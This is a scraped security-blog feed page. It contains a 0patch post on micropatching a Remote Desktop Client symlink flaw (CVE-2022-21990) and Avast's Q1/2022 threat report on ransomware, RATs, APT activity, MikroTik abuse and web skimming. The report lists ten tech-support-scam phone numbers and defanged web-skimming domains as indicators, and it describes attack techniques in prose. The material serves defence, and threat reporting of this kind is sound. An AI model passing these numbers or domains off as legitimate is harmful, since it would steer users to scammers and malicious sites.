🔒
There are new articles available, click to refresh the page.
Before yesterdayReverse Engineering

Micropatches for Remote Desktop Client RCE (CVE-2022-21990)

10 May 2022 at 15:50

 

by Mitja Kolsek, the 0patch Team

 

March 2022 Windows Updates brought a fix for a logical vulnerability in Remote Desktop Client for Windows that was found and reported by Abdelhamid Naceri. The vulnerability allowed a malicious RDP server to gain write access to any local drive on the computer running the connected RDP client, as long as at least one local drive was shared through the RDP session.

The trick Abdelhamid used in their POC was, as it so often happens, a symbolic link: Suppose you connected to a malicious RDP server and shared a locally plugged-in USB drive E:, the server could create a symbolic link from E:\temp to C:\ (which would mean your local C: drive, not server's) whereby the entire content of drive C:\ would become accessible to the server under E:\temp with permissions of the connecting user.

Microsoft assigned this issue CVE-2022-21990 and fixed it by preventing the server from creating symbolic links on drives that were shared with the server pointing to drives that were not shared with the server. This fix, however, was not delivered to Windows systems that no longer receive Windows Updates; such systems can now use our micropatches instead.

We decided to make our micropatches simpler than Microsoft's fix to avoid changing lots of code: our approach was to simply prevent creating symbolic links on drives that were shared with the server (regardless where these links would point to). We think it is very unlikely that our approach would break any reasonable use case - but just in case it does, the user can always temporarily disable our patch and then re-enable it - of course without restarting the computer, or even re-establishing the RDP connection.

Our micropatch was written for the following Windows versions that don't receive official patches from Microsoft:


  1. Windows 10 v1803 updated to May 2021
  2. Windows 10 v1809 updated to May 2021
  3. Windows 10 v2004 updated to December 2021
  4. Windows 7 updated with ESU year 2, ESU year 1 or updated to January 2020
  5. Windows Server 2008 R2 updated with ESU year 2, ESU year 1 or updated to January 2020


This micropatch has already been distributed to all online 0patch Agents with a PRO or Enterprise license. To obtain the micropatch and have it applied on your computers along with our other micropatches, create an account in 0patch Central, install 0patch Agent and register it to your account with a PRO or Enterprise subscription. Note that no computer restart is needed for installing the agent or applying/un-applying any 0patch micropatch. 

To learn more about 0patch, please visit our Help Center

We'd like to thank Abdelhamid Naceri for publishing their analysis and providing a proof-of-concept that allowed us to reproduce the vulnerability and create a micropatch. We also encourage security researchers to privately share their analyses with us for micropatching.

No more JuicyPotato? Old story, welcome RoguePotato!

5 May 2022 at 19:43
by splinter_code & decoder_it - 11 May 2020 After the hype we ( @splinter_code and me) created with our recent tweet , it’s time t...

Locky Ransomware is back! 49 domains compromised!

5 May 2022 at 19:43
by splinter_code - 26 June 2016 Locky ransomware starts up again its illegal activity of stealing money from their victims after a temporary inactivity since the end of May. This time, it comes with hard-coded javascript...

New Locky variant – Zepto Ransomware Appears On The Scene

5 May 2022 at 19:43
by splinter_code - 7 July 2016 New threat dubbed Zepto Ransomware is spreading out with a new email spam campaign. It is a variant of the...

Reverse Engineering a JavaScript Obfuscated Dropper

5 May 2022 at 19:43
by splinter_code - 31 July 2017 1. Introduction Nowadays one of the techniques most used to spread malware on windows systems is...

Weaponizing Mapping Injection with Instrumentation Callback for stealthier process injection

5 May 2022 at 19:43
by splinter_code - 16 July 2020 Process Injection is a technique to hide code behind benign and/or system processes. This technique is u...

RomHack2020 - Windows Privilege Escalations: Still abusing local service accounts to get SYSTEM privileges

5 May 2022 at 19:43
Slides here: https://github.com/antonioCoco/infosec-talks/blob/main/RomHack2020_Windows_Privilege_Escalations_Still_abusing_Service_Acco...

Relaying Potatoes: Another Unexpected Privilege Escalation Vulnerability in Windows RPC Protocol

5 May 2022 at 19:43
by splinter_code & decoder_it - 26 April 2021 Executive Summary Every Windows system is vulnerable to a particular NTLM relay attack...

We thought they were potatoes but they were beans (from Service Account to SYSTEM again)

5 May 2022 at 19:43
by splinter_code - 6 December 2019 This post has been written by me and two friends: @splinter_code and 0xea31 This is the “unintended...

Avast Q1/2022 Threat Report

5 May 2022 at 06:04

Cyberwarfare between Ukraine and Russia

Foreword

The first quarter of 2022 is over, so we are here again to share insights into the threat landscape and what we’ve seen in the wild. Under normal circumstances, I would probably highlight mobile spyware related to the Beijing 2022 Winter Olympics, yet another critical Java vulnerability (Spring4Shell), or perhaps how long it took malware authors to get back from their Winter holidays to their regular operations. Unfortunately, however, all of this was overshadowed by Russia’s war in Ukraine.

Similar to what’s happening in Ukraine, the warfare co-occurring in cyberspace is also very intensive, with a wide range of offensive arsenal in use. To name a few, we witnessed multiple Russia-attributed APT groups attacking Ukraine (using a series of wiping malware and ransomware, a massive uptick of Gamaredon APT toolkit activity, and satellite internet connections were disrupted). In addition, hacktivism, DDoS attacks on government sites, or data leaks are ongoing daily on all sides of the conflict. Furthermore, some of the malware authors and operators were directly affected by the war, such as the alleged death of the Raccoon Stealer leading developer, which resulted in (at least temporary) discontinuation of this particular threat. Additionally, some malware gangs have chosen the sides in this conflict and have started threatening the others. One such example is the Conti gang that promised ransomware retaliation for cyberattacks against Russia. You can find more details about this story in this report.

With all that said, it is hardly surprising to say that we’ve seen a significant increase of attacks of particular malware types in countries involved in this conflict in Q1/2022; for example, +50% of RAT attacks were blocked in Ukraine, Russia, and Belarus, +30% for botnets, and +20% for info stealers. To help the victims of these attacks, we developed and released multiple free ransomware decryption tools, including one for the HermeticRansom that we discovered in Ukraine just a few hours before the invasion started.

Out of the other malware-related Q1/2022 news: the groups behind Emotet and Trickbot appeared to be working closely together, resurrecting Trickbot infected computers by moving them under Emotet control and deprecating Trickbot afterward. Furthermore, this report describes massive info-stealing campaigns in Latin America, large adware campaigns in Japan, and technical support scams spreading in the US and Canada. Finally, again, the Lapsus$ hacking group emerged with breaches in big tech companies, including Microsoft, Nvidia, and Samsung, but hopefully also disappeared after multiple arrests of its members in March.

Last but not least, we’ve published our discovery of the latest Parrot Traffic Direction System (TDS) campaign that has emerged in recent months and is reaching users from around the world. This TDS has infected various web servers hosting more than 16,500 websites.

Stay safe and enjoy reading this report.

Jakub Křoustek, Malware Research Director

Methodology

This report is structured into two main sections – Desktop-related threats, informing about our intelligence on attacks targeting Windows, Linux, and macOS, and Mobile-related threats, where we advise about Android and iOS attacks.

Furthermore, we use the term risk ratio in this report to describe the severity of particular threats, calculated as a monthly average of “Number of attacked users / Number of active users in a given country.” Unless stated otherwise, calculated risks are only available for countries with more than 10,000 active users per month.

Desktop-Related Threats

Advanced Persistent Threats (APTs)

In March, we wrote about an APT campaign targeting betting companies in Taiwan, the Philippines, and Hong Kong that we called Operation Dragon Castling. The attacker, a Chinese-speaking group, leveraged two different ways to gain a foothold in the targeted devices – an infected installer sent in a phishing email and a newly identified vulnerability in the WPS Office updater (CVE-2022-24934). After successful infection, the malware used a diverse set of plugins to achieve privilege escalation, persistence, keylogging, and backdoor access.

Operation Dragon Castling: relations between the malicious files

Furthermore, on February 23rd, a day before Russia started its invasion of Ukraine, ESET tweeted that they discovered a new data wiper called HermeticWiper. The attacker’s motivation was to destroy and maximize damage to the infected system. It’s not just disrupting the MBR but also destroying a filesystem and individual files. Shortly after that, we at Avast discovered a related piece of ransomware that we called HermeticRansom. You can find more on this topic in the Ransomware section below. These attacks are believed to have been carried out by Russian APT groups.  

Continuing this subject, Gamaredon is known as the most active Russia-backed APT group targeting Ukraine. We see the standard high level of activity of this APT group in Ukraine which accelerated rapidly since the beginning of the Russian invasion at the end of February when the number of their attacks grew several times over.

Gamaredon APT activity Q4/2021 vs. Q1/2022

Gamaredon APT targeting in Q1/22

We also noticed an increase in Korplug activity which expanded its focus from the more usual south Asian countries such as Myanmar, Vietnam, or Thailand to Papua New Guinea and Africa. The most affected African countries are Ghana, Uganda and Nigeria. As Korplug is commonly attributed to Chinese APT groups, this new expansion aligns with their long-term interest in countries involved in China’s Belt and Road initiative.

New Korplug detections in Africa and Papua New Guinea

Luigino Camastra, Malware Researcher
Igor Morgenstern, Malware Researcher
Jan Holman, Malware Researcher

Adware

Desktop adware has become more aggressive in Q4/21, and a similar trend persists in Q1/22, as the graph below illustrates:

On the other hand, there are some interesting phenomena in Q1/22. Firstly, Japan’s proportion of adware activity has increased significantly in February and March; see the graph below. There is also an interesting correlation with Emotet hitting Japanese inboxes in the same period.

On the contrary, the situation in Ukraine led to a decrease in the adware activity in March; see the graph below showing the adware activity in Ukraine in Q1/22.

Finally, another interesting observation concerns adware activity in major European countries such as France, Germany, and the United Kingdom. The graph below shows increased activity in these countries in March, deviating from the trend of Q1/22.

Concerning the top strains, most of 64% of adware was from various adware families. However, the first clearly identified family is RelevantKnowledge, although so far with a low prevalence (5%) but with a +97% increase compared to Q4/21. Other identified strains in percentage units are ICLoader, Neoreklami, DownloadAssistant, and Conduit.

As mentioned above, the adware activity has a similar trend as in Q4/21. Therefore the risk ratios remained the same. The most affected regions are still Africa and Asia. About Q1/22 data, we monitored an increase of protected users in Japan (+209%) and France (+87%) compared with Q4/21. On the other hand, a decrease was observed in the Russian Federation (-51%) and Ukraine (-50%).

Adware risk ratio in Q1/22.

Martin Chlumecký, Malware Researcher

Bots

It seems that we are on a rollercoaster with Emotet and Trickbot. Last year, we went through Emotet takedown and its resurrection via Trickbot. This quarter, shutdowns of Trickbot’s infrastructure and Conti’s internal communication leaks indicate that Trickbot has finished its swan song. Its developers were supposedly moved to other Conti projects, possibly also with BazarLoader as Conti’s new product. Emotet also introduced a few changes – we’ve seen a much higher cadence of new, unique configurations. We’ve also seen a new configuration timestamp in the log “20220404”, interestingly seen on 24th March, instead of the one we’ve been accustomed to seeing (“20211114”).

There has been a new-ish trend coming with the advent of the war in Ukraine. Simple Javascript code has been used to create requests to (mostly) Russian web pages – ranging from media to businesses to banks. The code was accompanied by a text denouncing Russian aggression in Ukraine in multiple languages. The code has quickly spread around the internet into different variations, such as a variant of open-sourced game 2048. Unfortunately, we’ve started to see webpages that incorporated that code without even declaring it so it could even happen that your computer would participate in those actions while you were checking the weather on the internet. While these could remind us of Anonymous DDoS operations and LOIC (open-source stress tool Low Orbit Ion Cannon), these pages were much more accessible to the public using their browser only with (mostly) predetermined lists of targets. Nearing the end of March, we saw a significant decline in their popularity, both in terms of prevalence and the appearance of new variants.

The rest of the landscape does not bring many surprises. We’ve seen a significant risk increase in Russia (~30%) and Ukraine (~15%); those shouldn’t be much of a surprise, though, for the latter, it mostly does not project much into the number of affected clients.

In terms of numbers, the most prevalent strain was Emotet which doubled its market share since last quarter. Since the previous quarter, most of the other top strains slightly declined their prevalence. The most common strains we are seeing are:

  • Emotet
  • Amadey
  • Phorpiex
  • MyloBot
  • Nitol
  • MyKings
  • Dorkbot
  • Tofsee
  • Qakbot

Adolf Středa, Malware Researcher

Coinminers

Coincidently, as the cryptocurrency prices are somewhat stable these days, the same goes for the malicious coinmining activity in our user base.

In comparison with the previous quarter, crypto-mining threat actors increased their focus on Taiwan (+69%), Chile (+63%), Thailand (+61%), Malawi (+58%), and France (+58%). This is mainly caused by the continuous and increasing trend of using various web miners executing javascript code in the victim’s browser. On the other hand, the risk of getting infected significantly dropped in Denmark (-56%) and Finland (-50%).

The most common coinminers in Q1/22 were:

  • XMRig
  • NeoScrypt
  • CoinBitMiner
  • CoinHelper

Jan Rubín, Malware Researcher

Information Stealers

The activities of Information Stealers haven’t significantly changed in Q1/22 compared to Q4/21. FormBook, AgentTesla, and RedLine remain the most prevalent stealers; in combination, they are accountable for 50% of the hits within the category. 

Activity of Information Stealers in Q1/22.

We noticed the regional distribution has completely shifted compared to the previous quarter. In Q4/21, Singapore, Yemen, Turkey, and Serbia were the countries most affected by information stealers; in Q1/22, Russia, Brazil, and Argentina rose to the top tier after the increases in risk ratio by 27% (RU), 21% (BR), and 23% (AR) compared to the previous quarter.

Not only a popular destination for information stealers, Latin America also houses many regional-specific stealers capable of compromising victims’ banking accounts. As the underground hacking culture continues to develop in Brazil, these threat groups target their fellow citizens for financial purposes. In Brazil, Ousaban and Chaes pose the most significant threats with more than 100k and 70k hits. In Mexico in Q1/22, we observed more than 34k hits from Casbaneiro. A typical pattern shared between these groups is the multiple-stage delivery chain utilizing scripting languages to download and deploy the next stage’s payload while employing DLL sideloading techniques to execute the final stage.

Furthermore, Raccoon Stealer, an information stealer with Russian origins, significantly decreased in activity since March. Further investigation uncovered messages on Russian underground forums advising that the Raccoon group is not working anymore. A few days after the messages were posted, a Raccoon representative said one of their members died in the Ukrainian War – they have paused operations and plan to return in a few months with a new product.

Next, a macOS malware dubbed DazzleSpy was found using watering hole attacks targeting Chinese pro-democracy sympathizers; it was primarily active in Asia. This backdoor can control macOS remotely, execute arbitrary commands, and download and upload files to attackers, thus enabling keychain stealing, key-logging, and potential screen capture.

Last but not least, more malware that natively runs on M1 Apple chips (and Intel hardware) has been found. The malware family, SysJoker, targets all desktop platforms (Linux, Windows, and macOS); the backdoor is controlled remotely and allows downloading other payloads and executing remote commands.

Anh Ho, Malware Researcher
Igor Morgenstern, Malware Researcher
Vladimir Martyanov, Malware Researcher
Vladimír Žalud, Malware Analyst

Ransomware

We’ve previously reported a decline in the total number of ransomware attacks in Q4/21. In Q1/22, this trend continued with a further slight decrease. As can be seen on the following graph, there was a drop at the beginning of 2022; the number of ransomware attacks has since stabilized.

We believe there are multiple reasons for these recent declines – such as the geopolitical situation (discussed shortly) and the continuation of the trend of ransomware gangs focusing more on targeted attacks on big targets (big game hunting) rather than on regular users via the spray and pray techniques. In other words, ransomware is still a significant threat, but the attackers have slightly changed their targets and tactics. As you will see in the rest of this section, the total numbers are lower, but there was a lot ongoing regarding ransomware in Q1.

Based on our telemetry, the distribution of targeted countries is similar to Q4/21 with some Q/Q shifts, such as Mexico (+120% risk ratio), Japan (+37%), and India (+34%).

The most (un)popular ransomware strains – STOP and WannaCry – kept their position at the top. Operators of the STOP ransomware keep releasing new variants, and the same applies for the CrySiS ransomware. In both cases, the ransomware code hasn’t considerably evolved, so a new variant merely means a new extension of encrypted files, different contact e-mail and a different public RSA key.

The most prevalent ransomware strains in Q1/22:

  • WannaCry
  • STOP
  • VirLock
  • GlobeImposter
  • Makop

Out of the groups primarily focused on targeted attacks, the most active ones based on our telemetry were LockBit, Conti, and Hive. The BlackCat (aka ALPHV) ransomware was also on the rise. The LockBit group boosted their presence and also their egos, as demonstrated by their claim that they will pay any FBI agent that reveals their location a bounty of $1M. Later, they expanded that offer to any person on the planet.

You may also recall Sodinokibi (aka REvil), which is regularly mentioned in our threat reports. There is always something interesting around this ransomware strain and its operators with ties to Russia. In our Q4/21 Threat Report we informed about the arrests of some of its operators by Russian authorities. Indeed, this resulted in Sodinokibi almost vanishing from the threat landscape in Q1/2022. However, the situation got messy at the very end of Q1/2022 and early in April as new Sodinokibi indicators started appearing, including the publishing of new leaks from ransomed companies and malware samples. It is not yet clear whether this is a comeback, an imposter operation, reused Sodinokibi sources or infrastructure, or even their combination by multiple groups. Our gut feeling is that Sodinokibi will be a topic in the Q2/22 Threat Report once again.

Russian ransomware affiliates are a never-ending story. E.g. we can mention an interesting public exposure of a criminal dubbed Wazawaka with ties to Babuk, DarkSide, and other ransomware gangs in February. In a series of drunk videos and tweets he revealed much more than his missing finger.

The Russian invasion and following war on Ukraine, the most terrible event in Q1/22, had its counterpart in cyber-space. Just one day before the invasion, several cyber attacks were detected. Shortly after the discovery of HermeticWiper malware by ESET, Avast also discovered ransomware attacking Ukrainian targets. We dubbed it HermeticRansom. Shortly after, a flaw in the ransomware was found by CrowdStrike analysts. We acted swiftly and released a free decryptor to help victims in Ukraine. Furthermore, the war impacted ransomware attacks, as some of the ransomware authors and affiliates are from Ukraine and likely have been unable to carry out their operations due to the war.

And the cyber-war went on, together with the real one. A day after the start of the invasion, the Conti ransomware gang claimed its allegiance and threatened anyone who was considering organizing a cyber-attack or war activities against Russia:

As a reaction, a Ukrainian researcher started publishing internal files of the Conti gang, including Jabber conversations and the source code of the Conti ransomware itself. However, no significant amount of encryption keys were leaked. Also, the sources that were published were older versions of the Conti ransomware, which no longer correspond to the layout of the encrypted files that are created by today’s version of the ransomware. The leaked files and internal communications provide valuable insight into this large cybercrime organization, and also temporarily slowed down their operations.

Among the other consequences of the Conti leak, the published source codes were soon used by the NB65 hacking group. This gang declared a karmic war on Russia and used one of the modified sources of the Conti ransomware to attack Russian targets.

Furthermore, in February, members of historically one of the most active (and successful) ransomware groups, Maze, announced a shut-down of their operation. They published master decryption keys for their ransomware strains Maze, Egregor, and Sekhmet; four archive files were published that contained:

  • 19 private RSA-2048 keys for Egregor ransomware. Egregor uses a three-key encryption schema (Master RSA Key → Victim RSA Key → Per-file Key).
  • 30 private RSA-2048 keys (plus 9 from old version) for Maze ransomware. Maze also uses a three-key encryption scheme.
  • A single private RSA-2048 key for Sekhmet ransomware. Because this strain uses this RSA key to encrypt the per-file key, the RSA private key is likely campaign specific.
  • A source code for the M0yv x86/x64 file infector, that was used by Maze operators in the past.

Next, an unpleasant turn of events happened after we released a decryptor for the TargetCompany ransomware in February. This immediately helped multiple ransomware victims; however, two weeks later, we discovered a new variant of TargetComany that started using the ”.avast” extension for encrypted files. Shortly after, the malware authors changed the encryption algorithm, so our free decryption tool does not decrypt the most recent variant.

On the bright side, we also analyzed multiple variants of the Prometheus ransomware and released a free decryptor. This one covers all decryptable variants of the ransomware strain, even the latest ones.

Jakub Křoustek, Malware Research Director
Ladislav Zezula, Malware Researcher

Remote Access Trojans (RATs)

New year, new me RAT campaigns. As mentioned in the Q4/21 report, the RAT activity downward trend will be just temporary; the reality was a textbook example of this claim. Even malicious actors took holidays at the beginning of the new year and then returned to work.

In the graph below, we can see a Q4/21 vs. Q1/22 comparison of RAT activity:

This quarter’s countries most affected were China, Tajikistan, Kyrgyzstan, Iraq, Kazakhstan, and Russia. Kazakhstan will be mentioned later on with the emergence of a new RAT. We also detected a high Q/Q increase in the risk ratio in countries involved in the ongoing war: Ukraine (+54%), Russia (+53%), and Belarus (+46%).

In this quarter, we spotted a new campaign distributing several RATs, reaching thousands of users, mainly in Italy (1,900), Romania (1,100), and Bulgaria (950). The campaign leverages a Crypter (a crypter is a specific tool used by malware authors for obfuscation and protection of the target payload), which we call Rattler, that ensures a distribution of arbitrary malware onto the victim’s PC. Currently, the crypter primarily distributes remote access trojans, focusing on Warzone, Remcos, and NetWire. Warzone’s main targeting campaigns also seemed to change during the past three months. In January and February, we received a considerable amount of detections from Russia and Ukraine. Still, this trend reversed in March, with decreased detections in these two countries and a significant increase in Spain, indicating a new malicious campaign.

Most prevalent RATs in Q1 were:

  • njRAT
  • Warzone
  • Remcos
  • AsyncRat
  • NanoCore
  • NetWire
  • QuasarRAT
  • PoisionIvy
  • Adwind
  • Orcus

Among malicious families with the highest increase in detections were Lilith, LuminosityLink, and Gh0stCringe. One of the reasons for the Gh0stCringe increase is a malicious campaign in which this RAT spread on poorly protected MySQL and Microsoft SQL database servers. We have also witnessed a change in the first two places of the most prevalent RATs. In Q4/21, the most pervasive was Warzone which declined this quarter by 23%. The njRat family, on the other hand, increased by 32%, and what was surprising, Adwind entered into the top 10.

Except for the usual malicious campaigns, this quarter was different. There were two significant causes for this. The first was a Lapsus$ hacking and leaking spree, and the other was the war with Ukraine.

The hacking group Lapsus$ targeted many prominent technology companies like Nvidia, Samsung, and Microsoft. For example, in the NVIDIA Lapsus$ case, this hacking group stole about 1TB of NVIDIA’s data and then commenced to leak it. The leaked data contained binary signing certificates, which were later used for signing malicious binaries. Among such signed malware was, for example, the Quasar RAT.

Then there was the conflict in Ukraine, which showed the power of information technology and the importance of cyber security – because the fight happens not only on the battlefield but also in cyberspace, with DDOS attacks, data-stealing, exploitation, cyber espionage, and other techniques. But except for these countries involved in the war, everyday people looking for information are easy targets of malicious campaigns. One such campaign involved sending email messages with attached office documents that allegedly contained important information about the war. Unfortunately, these documents were just a way to infect people with Remcos RAT with the help of Microsoft Word RCE vulnerability CVE-2017-11882, thanks to which the attacker could easily infect unpatched systems.

As always, not only old known RATs showed up. This quarter brought us a few new ones as well. The first addition to our RAT list was IceBot. This RAT seems to be a creation of the APT group FIN7; it contains all usual basic capabilities as other RATs like taking screenshots, remote code execution, file transfer, and detection of installed AV.

Another one is Hodur. This RAT is a variant of PlugX (also known as Korplug), associated with Chinese APT organizations. Hodur differed, using a different encoding, configuration capabilities, and  C&C commands. This RAT allows attackers to log keystrokes, manipulate files, fingerprint the system and more.

We mentioned that Kazakhstan is connected to a new RAT on this list. That RAT is called Borat RAT. The name is taken from the popular comedy film Borat where the main character Borat Sagdijev, performed by actor Sacha Baron Cohen, was presented as a Kazakh visiting the USA. Did you know that in reality the part of the film that should represent living in Kazakhstan village wasn’t even filmed there but in the Romanian village of Glod?

This RAT is a .NET binary and uses simple source-code obfuscation. The Borat RAT was initially discovered on hacking forums and contains many capabilities. Some features include triggering BSOD, anti-sandbox, anti-VM, password stealing, web-cam spying, file manipulation and more. As well as these baked-in features, it enables extensive module functionality. These modules are DLLs that are downloaded on demand, allowing the attackers to add multiple new capabilities. The list of currently available modules contains files “Ransomware.dll” used for encrypting files, “Discord.dll” for stealing Discord tokens, and many more.

Here you can see an example of the Borat RAT admin panel. 

We also noticed that the volume of Python compiled and Go programming language ELF binaries for Linux increased this quarter. The threat actors used open source RAT projects (i.e. Bring Your Own Botnet or Ares) and legitimate services (e.g. Onion.pet, termbin.com or Discord) to compromise systems. We were also one of the first to protect users against Backdoorit and Caligula RATs; both of these malware families were written in Go and captured in the wild by our honeypots.

Samuel Sidor, Malware Researcher
Jan Rubín, Malware Researcher
David Àlvarez, Malware Researcher

Rootkits

In Q1/22,  rootkit activity was reduced compared to the previous quarter, returning to the long-term value, as illustrated in the chart below.

The close-up view of Q1/22 demonstrates that January and February have been more active than the March period.

We have monitored various rootkit strains in Q1/22. However, we have identified that approx. 37% of rootkit activity is r77-Rootkit (R77RK) developed by bytecode77 as an open-source project under the BSD license. The rootkit operates in Ring 3 compared to the usual rootkits that work in Ring 0. R77RK is a configurable tool hiding files, directories, scheduled tasks, processes, services, connections, etc. The tool is compatible with Windows 7 and Windows 10. The consequence is that R77RK was captured with several different types of malware as a supporting library for malware that needs to hide malicious activity.

The graph below shows that China is still the most at-risk country in terms of protected users. Moreover, the risk in China has increased by about +58%, although total rootkit activity has been orders of magnitude lower compared to Q4/21. This phenomenon is caused by the absence of the Cerbu rootkit that was spread worldwide, so the main rootkit activity has moved back to China. Namely, the decrease in the rootkit activity has been observed in the countries as follows: Vietnam, Thailand, the Czech Republic, and Egypt.

In summary, the situation around the rootkit activity seems calmer compared to Q4/21, and China is still the most affected country in Q1/22. Noteworthy, the war in Ukraine has not increased the rootkit activity. Numerous malware authors have started using open-source solutions of rootkits, although these are very well detectable.

Martin Chlumecký, Malware Researcher

Technical support scams

After quite an active Q4/21 that overlapped with the beginning of Q1/22, technical support scams started to decline in inactivity. There were some small peaks of activity, but the significant wave of one particular campaign came at the end of Q1/22.

According to our data, the most targeted countries were the United States and Canada. However, we’ve seen instances of this campaign active even in other areas, like Europe, for example, France and Germany.

The distinctive sign of this campaign was the lack of a domain name and a specific path; this is illustrated in the following image.

During the beginning of March, we collected thousands of new unique domain-less URLs that have one significant and distinctive sign, their url path. After being redirected, an affected user loads a web page with a well-known recycled appearance, used in many previous technical support campaigns. In addition, several pop-up windows, the logo of well-known companies, antivirus-like messaging, cursor manipulation techniques, and even sounds are all there for one simple reason: a phone call to the phone number shown.

More than twenty different phone numbers have been used. Examples of such numbers can be seen in the following table:

1-888-828-5604
1-888-200-5532
1-877-203-5120
1-888-770-6555
1-855-433-4454
1-833-576-2199
1-877-203-9046
1-888-201-5037
1-866-400-0067
1-888-203-4992

Alexej Savčin, Malware Analyst

Traffic Direction System (TDS)

A new Traffic Direction System (TDS) we are calling Parrot TDS was very active throughout Q1/2022. The TDS has infected various web servers hosting more than 16,500 websites, ranging from adult content sites, personal websites, university sites, and local government sites.

Parrot TDS acts as a gateway for other malicious campaigns to reach potential victims. In this particular case, the infected sites’ appearances are altered by a campaign called FakeUpdate (also known as SocGholish), which uses JavaScript to display fake notices for users to update their browser, offering an update file for download. The file observed being delivered to victims is a remote access tool.

From March 1, 2022, to March 29, 2022, we protected more than 600,000 unique users from around the globe from visiting these infected sites. We protected the most in Brazil – over  73,000 individual users, in India – nearly 55,000 unique users, and more than 31,000 unique users from the US.

Map illustrating the countries Parrot TDS has targeted (in March)

Jan Rubín, Malware Researcher
Pavel Novák, Threat Operations Analyst

Vulnerabilities and Exploits

Spring in Europe has had quite a few surprises for us, one of them being a vulnerability in a Java framework called, ironically, Spring. The vulnerability is called Spring4Shell (CVE-2022-22963), mimicking the name of last year’s Log4Shell vulnerability. Similarly to Log4Shell, Spring4Shell leads to remote code execution (RCE). Under specific conditions, it is possible to bind HTTP request parameters to Java objects. While there is a logic protecting classLoader from being used, it was not foolproof, which led to this vulnerability. Fortunately, the vulnerability requires a non-default configuration, and a patch is already available.

The Linux kernel had its share of vulnerabilities; a vulnerability was found in pipes, which usually provide unidirectional interprocess communication, that can be exploited for local privilege escalation. The vulnerability was dubbed Dirty Pipe (CVE-2022-0847). It relies on the usage of partially uninitialized memory of the pipe buffer during its construction, leading to an incorrect value of flags, potentially providing write-access to pages in the cache that were originally marked with a read-only attribute. The vulnerability is already patched in the latest kernel versions and has already been fixed in most mainstream Linux distributions.

First described by Trend Micro researchers in 2019, the SLUB malware is a highly targeted and sophisticated backdoor/RAT spread via browser exploits. Now, three years later, we detected its new exploitation attack, which took place in Japan and targeted an outdated Internet Explorer.

The initial exploit injects into winlogon.exe, which will, in turn, download and execute the final stage payload. The final stage did not change much since the initial report, and it still uses Slack as a C&C server but now uses file[.]io for data exfiltration.

This is an excellent example that old threats never really go away; they often continue to evolve and pose a threat.

Adolf Středa, Malware Researcher
Jan Vojtěšek, Malware Reseracher

Mikrotik CVEs keep giving

It’s been almost four years since the very severe vulnerability CVE-2018-14847 targeting MikroTik devices first appeared. What seemed to be yet another directory traversal bug quickly escalated into user database and password leaks, resulting in a potentially disastrous vulnerability ready to be misused by cybercriminals. Unfortunately, the simplicity of exploiting and wide adoption of these devices and powerful features provided a solid foundation for various malicious campaigns being executed using these devices. It first started with injecting crypto mining javascript into pages script by capturing the traffic, poisoning the DNS cache, and incorporating these devices into botnets for DDoS and proxy purposes.  

Unfortunately, these campaigns come in waves, and we still observe MikroTik devices being misused repeatedly. In Q1/22, we’ve seen a lot of exciting twists and turns, the most prominent of which was probably the Conti group leaks which also shed light on the TrickBot botnet. For quite some time, we knew that TrickBot abused MikroTik devices as proxy servers to hide the next tier of their C&C. The leaking of Conti and Trickbot infrastructure meant the end of this botnet. However, it also provided us clues and information about one of the vastest botnets as a service operation connecting Glupteba, Meris, crypto mining campaigns, and, perhaps also, TrickBot. We are talking about 230K devices controlled by one threat actor and rented out as a service. You can find more in our research Mēris and TrickBot standing on the shoulders of giants

A few days before we published our research in March, a new story emerged describing the DDoS campaign most likely tied to the Sodinokibi ransomware group. Unsurprisingly most of the attacking devices were MikroTik again. A few days ago, we were contacted by security researchers from SecurityScoreCard. They have observed another DDoS botnet called Zhadnost targeting Ukrainian institutions and again using MikroTik devices as an amplification vector. This time, they were mainly misusing DNS amplification vulnerabilities. 

We also saw one compelling instance of a network security incident potentially involving MikroTik routers. In the infamous cyberattack on February 24th against the Viasat KA-SAT service, attackers penetrated the management segment of the network and wiped firmware from client terminal devices.

The incident surfaced more prominently after the cyberattack paralyzed 11 gigawatts of German wind turbine production as a probable spill-over from the KA-SAT issue. The connectivity for turbines is provided by EuroSkyPark, one of the satellite internet providers using the KA-SAT network.

When we analyzed ASN AS208484, an autonomous system assigned to EuroSkyPark, we found 15 MikroTik devices with exposed TCP port 8728, which is used for API access to administer the devices. Also of concern, one of the devices had a port for an infamously vulnerable WinBox protocol port exposed to the Internet. As of now, all mentioned ports are closed and no longer accessible.

We also found SSH access remapped to non-standard ports such as 9992 or 9993. This is not typically common practice and may also indicate compromise. Attackers have been known to remap the ports of standard services (such as SSH) to make it harder to detect or even for the device owner to manage. However, this could also be configured deliberately for the same reason: to hide SSH access from plain sight.

CVE-2018-14847 vulnerable devices in percent by country

From all the above, it’s apparent that we can expect to see similar patterns and DDoS attacks carried not only by MikroTik devices but also by other vulnerable IoT devices in the foreseeable future. On a positive note, the number of MikroTik devices vulnerable to the most commonly misused CVEs is slowly decreasing as new versions of RouterOS (OS that powers the MikroTik appliances) are rolled out. Unfortunately, however, there are many devices already compromised, and without administrative intervention, they will continue to be used for malicious operations repeatedly. 

We strongly recommend that MikroTik administrators ensure they have updated and patched to protect themselves and others.  


If you are a researcher and you think you have seen MikroTik devices involved in some malicious activity, please consider contacting us if you need help or consultation; since 2018, we have built up a detailed understanding of these devices’ threat landscape.

Router OS major version 7 and above adoption

Martin Hron, Malware Researcher

Web skimming

In Q1/22, the most prevalent web skimming malicious domain was naturalfreshmall[.]com, with more than 500 e-commerce sites infected. The domain itself is no longer active, but many websites are still trying to retrieve malicious content from it. Unfortunately, it means that administrators of these sites still have not removed malicious code and these sites are likely still vulnerable. Avast protected 44k users from this attack in the first quarter.

The heatmap below shows the most affected countries in Q1/22 – Saudi Arabia, Australia, Greece, and Brazil. Compared to Q4/21, Saudi Arabia, Australia and Greece stayed at the top, but in Brazil, we protected almost two times more users than in the previous quarter. However, multiple websites were infected in Brazil, some with the aforementioned domain naturalfreshmall[.]com. In addition, we tweeted about philco.com[.]br, which was infected with yoursafepayments[.]com/fonts.css. And last but not least, pernambucanas.com[.]br was also infected with malicious javascript hidden in the file require.js on their website.

Overall the number of protected users remains almost the same as in Q4/21.

Pavlína Kopecká, Malware Analyst

Mobile-Related Threats

Adware/HiddenAds

Adware maintains its dominance over the Android threat landscape, continuing the trend from previous years. Generally, the purpose of Adware is to display out-of-context advertisements to the device user, often in ways that severely impact the user experience. In Q1/22, HiddenAds, FakeAdblockers, and others have spread to many Android devices; these applications often display device-wide advertisements that overlay the user’s intended activity or limit the app’s functionality by displaying timed ads without the ability to skip them.

